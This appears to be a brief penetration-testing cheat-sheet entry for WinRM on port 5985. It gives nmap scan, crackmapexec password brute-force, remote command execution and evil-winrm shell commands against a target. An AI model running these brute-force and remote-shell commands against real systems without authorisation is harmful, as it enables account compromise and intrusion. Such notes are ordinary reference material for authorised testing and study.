WinRM-5985

  • scan

nmap -sV -sC -Pn -p 5985 $IP -oN recon/winrm
  • brute force

# crackmapexec
crackpmapexec winrm $IP -u $username -p /path/to/wordlists 
  • Execute commands

# crackmapexec
crackmapexec winrm $IP -u $username -p $password -x "whoami"
# evil-winrm (get a shell session)
evil-winrm -u $username -p $password -i $IP 

Last updated